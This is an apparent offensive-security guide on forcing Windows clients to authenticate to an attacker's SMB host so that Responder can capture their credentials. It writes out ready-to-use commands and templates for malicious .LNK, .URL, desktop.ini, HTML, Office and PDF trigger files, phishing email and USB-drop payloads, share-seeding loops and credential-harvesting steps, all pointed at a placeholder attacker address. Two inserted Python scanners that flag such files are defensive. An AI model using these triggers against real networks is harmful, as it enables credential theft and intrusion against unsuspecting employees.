This guide is currently under development, and I greatly welcome any suggestions or feedback at reaper.gitbook@gmail.com

Authentication Triggers and Forcing Techniques

Understanding Authentication Triggers

Poisoning Attack Dependencies

Problem: Poisoning attacks are passive - they wait for natural authentication events that may never occur.

Solution: Active triggering - Force clients to attempt authentication to attacker-controlled services.

Attack Flow:

Trigger Deployment → Client Interaction → Authentication Attempt → Poisoning Response → Credential Capture

Requirements: Method to deliver triggers, user interaction or automated system behavior

Attack Value: Guaranteed authentication attempts instead of waiting for natural failures


File-Based Authentication Triggers

Malicious .LNK Files (Windows Shortcuts)

Purpose: Create Windows shortcut files that automatically attempt network authentication when accessed.

Requirements: File deployment method (email, file shares, USB), Windows file explorer access

Attack Value: Automatic authentication on file access, works with file previews

Basic LNK File Creation

# Create malicious LNK using PowerShell
powershell -c "
\$WshShell = New-Object -comObject WScript.Shell
\$Shortcut = \$WshShell.CreateShortcut('\\\\<attacker-ip>\\share\\file.lnk')
\$Shortcut.TargetPath = '\\\\<attacker-ip>\\share\\target.exe'
\$Shortcut.IconLocation = '\\\\<attacker-ip>\\share\\icon.ico,0'
\$Shortcut.Save()
"

# Create LNK with embedded UNC path
powershell -c "
\$objShell = New-Object -ComObject WScript.Shell
\$lnk = \$objShell.CreateShortcut('Document.lnk')
\$lnk.TargetPath = '\\\\<attacker-ip>\\share\\document.docx'
\$lnk.Save()
"

Advanced LNK File Techniques

# LNK with legitimate-looking target but malicious icon
powershell -c "
\$WshShell = New-Object -comObject WScript.Shell
\$Shortcut = \$WshShell.CreateShortcut('Important_Document.lnk')
\$Shortcut.TargetPath = 'C:\\Windows\\System32\\notepad.exe'
\$Shortcut.IconLocation = '\\\\<attacker-ip>\\share\\document.ico,0'
\$Shortcut.Arguments = 'C:\\Windows\\System32\\drivers\\etc\\hosts'
\$Shortcut.Save()
"

# LNK targeting network printers (common in corporate environments)
powershell -c "
\$lnk = (New-Object -ComObject WScript.Shell).CreateShortcut('Printer.lnk')
\$lnk.TargetPath = '\\\\<attacker-ip>\\print\$\\HP_LaserJet'
\$lnk.Save()
"

Malicious .URL Files (Internet Shortcuts)

Purpose: Internet shortcut files that trigger authentication when accessed or previewed.

Requirements: File deployment method, Windows Explorer or web browser access

Attack Value: Triggers authentication on file preview, works in email attachments

Basic URL File Creation

# Create malicious URL file
cat > malicious.url << 'EOF'
[InternetShortcut]
URL=file://<attacker-ip>/share/document.pdf
IconFile=\\<attacker-ip>\share\icon.ico
IconIndex=0
EOF

# URL file targeting internal services
cat > internal_portal.url << 'EOF'
[InternetShortcut]
URL=file://<attacker-ip>/intranet/portal
WorkingDirectory=\\<attacker-ip>\share\
IconFile=\\<attacker-ip>\share\portal.ico
IconIndex=0
EOF

Advanced URL File Techniques

# URL file with legitimate destination but malicious icon
cat > company_portal.url << 'EOF'
[InternetShortcut]
URL=https://portal.company.com
IconFile=\\<attacker-ip>\share\company_logo.ico
IconIndex=0
HotKey=0
IDList=
EOF

# URL file targeting WebDAV
cat > webdav_trigger.url << 'EOF'
[InternetShortcut]
URL=\\<attacker-ip>\webdav\documents\report.docx
EOF
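A defender-side scanner for the LNK and URL trigger files described in the two sections above, added here as an example and not part of the original guide or of any tool it names. It pulls UNC (\\host\share) and file:// host names out of a file's raw bytes in both ASCII and UTF-16LE (the string data inside a .lnk is UTF-16LE, while .url and desktop.ini text is usually ASCII, so the same scan also catches the desktop.ini and HTML variants shown later on this page) and reports hosts missing from an allowlist of known file servers. The allowlist name, the 10.0.0.99 address and all sample file contents are constructed.

```python
import re, sys

# Regex pieces for a host name in ASCII and in UTF-16LE (every char followed by a NUL byte).
HOST8 = rb'([A-Za-z0-9._-]+)'
HOST16 = rb'((?:[A-Za-z0-9._-]\x00)+)'

def lit16(s: str) -> bytes:
    """Regex-escaped UTF-16LE encoding of a literal string."""
    return re.escape(s.encode('utf-16-le'))

# A UNC reference is \\host\..., a file URL is file://host/...; the trailing separator is
# required so that local file:///C:/... URLs (which carry no host) are not reported.
PATTERNS = [
    (re.compile(rb'\\\\' + HOST8 + rb'\\'), 'ascii'),
    (re.compile(rb'file://' + HOST8 + rb'/'), 'ascii'),
    (re.compile(lit16('\\\\') + HOST16 + lit16('\\')), 'utf-16-le'),
    (re.compile(lit16('file://') + HOST16 + lit16('/')), 'utf-16-le'),
]

def remote_hosts(data: bytes) -> set:
    """Every host the file would make a client contact through UNC or file:// references."""
    return {m.group(1).decode(enc).lower()
            for rx, enc in PATTERNS for m in rx.finditer(data)}

def suspicious_hosts(data: bytes, allowlist) -> set:
    """Referenced hosts that are not known file servers."""
    allowed = {h.lower() for h in allowlist}
    return remote_hosts(data) - allowed

# Constructed samples: 10.0.0.99 stands in for an unknown host, fileserver01 is "ours".
ALLOWLIST = {'fileserver01.corp.example'}
SAMPLE_URL = (b'[InternetShortcut]\r\nURL=file://10.0.0.99/share/document.pdf\r\n'
              b'IconFile=\\\\10.0.0.99\\share\\icon.ico\r\nIconIndex=0\r\n')
SAMPLE_DESKTOP_INI = b'[.ShellClassInfo]\r\nIconResource=\\\\fileserver01.corp.example\\icons\\f.ico,0\r\n'
SAMPLE_LNK_STRINGS = '\\\\10.0.0.99\\share\\document.ico'.encode('utf-16-le')  # ICON_LOCATION as a .lnk stores it
SAMPLE_HTML = b'<img src="file://fileserver01.corp.example/share/logo.png"><img src="file:///C:/Temp/x.png">'

if __name__ == '__main__':
    # Usage: python scan.py FILE...   prints files referencing hosts outside the allowlist
    for path in sys.argv[1:]:
        with open(path, 'rb') as fh:
            hits = suspicious_hosts(fh.read(), ALLOWLIST)
        if hits:
            print(f'{path}: {", ".join(sorted(hits))}')
```

Because it works on raw bytes, the scan can run on mail attachments, share contents or USB media without parsing each format; a hit only says the file references an unknown host, so the allowlist has to be kept accurate to avoid noise.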

Document-Based Authentication Triggers

Microsoft Office Documents with UNC Paths

Purpose: Embed UNC paths in Office documents to trigger authentication when opened.

Requirements: Microsoft Office installation, document delivery method

Attack Value: Automatic authentication on document open, works with auto-preview

Word Document with External References

<!-- Insert into Word document XML -->
<w:fldSimple w:instr="INCLUDEPICTURE &quot;\\<attacker-ip>\share\image.png&quot; \* MERGEFORMAT">
    <w:r><w:t>Loading...</w:t></w:r>
</w:fldSimple>

<!-- Alternative: External template reference -->
<w:attachedTemplate w:val="\\<attacker-ip>\share\template.dotx"/>

Excel with External Data Connections

<!-- Excel external data connection -->
<connection>
    <name>ExternalData</name>
    <connectionString>Provider=Microsoft.ACE.OLEDB.12.0;Data Source=\\<attacker-ip>\share\data.xlsx</connectionString>
</connection>

PowerPoint with External Media

<!-- PowerPoint with external image -->
<p:pic>
    <p:blipFill>
        <a:blip r:embed="\\<attacker-ip>\share\slide_image.png"/>
    </p:blipFill>
</p:pic>
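Added example, not code from the guide or from any Office tooling: a Python inspector that opens an Office Open XML document as the zip it is and lists the resources Word would fetch on open, namely relationships with TargetMode="External" in the *.rels parts (where an attachedTemplate reference lands) and INCLUDEPICTURE/INCLUDETEXT field codes in the part XML, and reports any that point at a UNC or file:// host outside an allowlist. It covers the Word forms shown above, not the Excel connection string or PowerPoint media variants; the sample document, the 10.0.0.99 address and the allowlist are constructed.

```python
import io, re, zipfile
import xml.etree.ElementTree as ET

RELS_NS = '{http://schemas.openxmlformats.org/package/2006/relationships}'
# Host of a UNC (\\host\...) or file://host/... reference; http(s) links deliberately do not match.
REMOTE = re.compile(r'(?:\\\\|file:/+)([A-Za-z0-9._-]+)[\\/]')
# Target of an INCLUDEPICTURE / INCLUDETEXT field instruction, quoted with " or &quot; in the XML.
FIELD = re.compile(r'INCLUDE(?:PICTURE|TEXT)\s+(?:&quot;|")?([^&"\s]+)')

def external_refs(doc: bytes):
    """Yield (part, target) for each resource the document fetches when it is opened."""
    with zipfile.ZipFile(io.BytesIO(doc)) as z:
        for name in z.namelist():
            raw = z.read(name)
            if name.endswith('.rels'):  # package relationships, e.g. attachedTemplate
                for rel in ET.fromstring(raw).iter(RELS_NS + 'Relationship'):
                    if rel.get('TargetMode') == 'External':
                        yield name, rel.get('Target', '')
            elif name.endswith('.xml'):  # field codes live in the part XML itself
                for m in FIELD.finditer(raw.decode('utf-8', 'replace')):
                    yield name, m.group(1)

def flag_external_hosts(doc: bytes, allowlist=()) -> dict:
    """{host: [(part, target), ...]} for UNC/file:// references to hosts not in the allowlist."""
    allowed = {h.lower() for h in allowlist}
    flagged = {}
    for part, target in external_refs(doc):
        m = REMOTE.search(target)
        if m and m.group(1).lower() not in allowed:
            flagged.setdefault(m.group(1).lower(), []).append((part, target))
    return flagged

def build_sample_docx() -> bytes:
    """A constructed, minimal .docx carrying the two Word tricks from the section above."""
    document_xml = (
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body><w:p>'
        '<w:fldSimple w:instr="INCLUDEPICTURE &quot;\\\\10.0.0.99\\share\\image.png&quot; \\* MERGEFORMAT">'
        '<w:r><w:t>Loading...</w:t></w:r></w:fldSimple></w:p></w:body></w:document>')
    settings_rels = (
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" TargetMode="External" Target="file:///\\\\10.0.0.99\\share\\template.dotx" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"/>'
        '<Relationship Id="rId2" TargetMode="External" Target="https://portal.corp.example/" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/>'
        '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as z:
        z.writestr('word/document.xml', document_xml)
        z.writestr('word/_rels/settings.xml.rels', settings_rels)
    return buf.getvalue()
```

Running flag_external_hosts(build_sample_docx(), ['fileserver01.corp.example']) reports 10.0.0.99 twice (the picture field and the template relationship) while the ordinary https hyperlink is left alone.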

PDF Files with SMB References

Purpose: Create PDF files that reference SMB shares to trigger authentication.

// JavaScript in PDF to trigger SMB authentication
this.exportDataObject({
    cName: "malicious",
    nLaunch: 2,
    cDIPath: "\\\\<attacker-ip>\\share\\file.txt"
});

Web-Based Authentication Triggers

HTML Files with UNC References

Purpose: HTML files that automatically attempt SMB authentication when opened in browsers.

Requirements: Web browser that supports file:// protocol, file delivery method

Attack Value: Immediate authentication attempt on file open

Basic HTML Authentication Triggers

<!-- HTML with IMG tag UNC reference -->
<!DOCTYPE html>
<html>
<head><title>Company Document</title></head>
<body>
    <h1>Important Company Information</h1>
    <img src="file://<attacker-ip>/share/logo.png" width="1" height="1">
    <p>Loading content...</p>
</body>
</html>

<!-- HTML with multiple trigger methods -->
<!DOCTYPE html>
<html>
<head>
    <title>Document Viewer</title>
    <link rel="icon" href="file://<attacker-ip>/share/favicon.ico">
</head>
<body>
    <iframe src="file://<attacker-ip>/share/content.html" width="1" height="1"></iframe>
    <object data="file://<attacker-ip>/share/document.pdf" width="1" height="1"></object>
    <embed src="file://<attacker-ip>/share/media.wmv" width="1" height="1">
</body>
</html>

Advanced HTML Techniques

<!-- HTML with CSS background image -->
<!DOCTYPE html>
<html>
<head>
    <style>
        body { background-image: url('file://<attacker-ip>/share/bg.png'); }
        .hidden { background: url('\\<attacker-ip>\share\pixel.gif'); }
    </style>
</head>
<body>
    <div class="hidden"></div>
    <h1>Company Portal</h1>
</body>
</html>

<!-- HTML with JavaScript trigger -->
<script>
    var img = new Image();
    img.src = "file://<attacker-ip>/share/track.gif";
</script>

Email-Based Authentication Triggers

Malicious Email Attachments

Purpose: Deliver authentication triggers via email attachments or embedded content.

Requirements: Email delivery capability, target email addresses

Attack Value: Wide distribution, social engineering potential

Email with Embedded UNC Paths

<!-- HTML email with hidden authentication triggers -->
<html>
<body>
    <h2>Important Company Announcement</h2>
    <p>Please review the attached document.</p>
    
    <!-- Hidden authentication triggers -->
    <img src="file://<attacker-ip>/share/pixel.gif" width="1" height="1" style="display:none;">
    <div style="background:url('\\<attacker-ip>\share\bg.png');width:1px;height:1px;"></div>
    
    <p>Best regards,<br>IT Department</p>
</body>
</html>

Outlook Signature Exploitation

<!-- Malicious Outlook signature -->
<div>
    <p>John Smith<br>
    IT Administrator<br>
    Company Inc.</p>
    <img src="\\<attacker-ip>\share\company_logo.png" width="100" height="50">
</div>

System-Level Authentication Triggers

Windows Search Indexing Triggers

Purpose: Create files that trigger authentication during Windows Search indexing.

# Create searchable document with UNC reference
cat > search_trigger.txt << 'EOF'
Company Confidential Document
For more information, see: \\<attacker-ip>\share\details.txt
EOF

# Place in commonly indexed locations
cp search_trigger.txt ~/Desktop/
cp search_trigger.txt ~/Documents/

Desktop.ini File Manipulation

Purpose: Modify desktop.ini files to trigger authentication when folders are accessed.

# Malicious desktop.ini
cat > desktop.ini << 'EOF'
[.ShellClassInfo]
IconResource=\\<attacker-ip>\share\folder.ico,0
InfoTip=Company shared folder
EOF

# Make hidden and system file
attrib +h +s desktop.ini

Automated Trigger Deployment

USB-Based Trigger Deployment

Purpose: Deploy multiple authentication triggers via USB autorun or social engineering.

# Create USB payload structure
mkdir usb_payload
cd usb_payload

# Multiple trigger files
echo '[InternetShortcut]' > important_doc.url
echo 'URL=file://<attacker-ip>/share/document.pdf' >> important_doc.url

# LNK file
powershell -c "
\$lnk = (New-Object -ComObject WScript.Shell).CreateShortcut('$(pwd)/salary_info.lnk')
\$lnk.TargetPath = '\\\\<attacker-ip>\\share\\salary.xlsx'
\$lnk.Save()
"

# HTML trigger
cat > company_portal.html << 'EOF'
<!DOCTYPE html><html><body>
<img src="file://<attacker-ip>/share/logo.png" width="1" height="1">
<h1>Redirecting to company portal...</h1>
</body></html>
EOF

Network Share Trigger Deployment

Purpose: Place trigger files on accessible network shares for widespread distribution.

# Deploy to common share locations
smbclient //<file-server>/public -U <username> -c "put malicious.lnk"
smbclient //<file-server>/shared -U <username> -c "put trigger.url"

# Target user home directories
for user in $(cat users.txt); do
    smbclient //<file-server>/$user -U <username> -c "put personal_doc.lnk Desktop/"
done

Trigger Optimization and Evasion

Legitimate-Looking Triggers

# Use company-specific naming
Company_Salary_Report_2024.lnk
IT_Security_Update.url
Emergency_Contact_List.html

# Target department-specific interests
HR_Benefits_Package.lnk          # Target HR department
Financial_Q4_Results.url         # Target Finance
IT_Equipment_Inventory.html      # Target IT staff

Multiple Trigger Deployment

# Deploy various trigger types simultaneously
# Email campaign with HTML triggers
# USB drops with LNK files  
# Network share population with URL files
# Document templates with UNC references

# Monitor for authentication attempts
sudo responder -I eth0 -wrf -v | grep -E '(COMPANY\\|company\.com)'

Integrated Poisoning + Trigger Workflow

Comprehensive Attack Campaign

# Phase 1: Setup poisoning infrastructure
sudo responder -I eth0 -wrf -v

# Phase 2: Deploy authentication triggers
# Create and distribute malicious files
powershell -c "
\$lnk = (New-Object -ComObject WScript.Shell).CreateShortcut('Q4_Budget.lnk')
\$lnk.TargetPath = '\\\\<attacker-ip>\\share\\budget.xlsx'
\$lnk.Save()
"

# Phase 3: Monitor for triggered authentication
tail -f /usr/share/responder/logs/*.txt | grep -E "triggered|forced"

# Phase 4: Process captured domain credentials
grep -E "DOMAIN\\\\" /usr/share/responder/logs/*.txt > triggered_creds.txt

Trigger Success Indicators

  • Immediate Authentication: Triggers work within minutes/hours vs. days for passive poisoning

  • High Volume: Multiple authentication attempts from single trigger deployment

  • Predictable Timing: Authentication correlates with trigger deployment timing

  • Targeted Success: Higher rate of administrative/service account capture

Authentication triggers transform passive poisoning into active credential harvesting, dramatically increasing success rates and reducing time-to-compromise in AD environments.
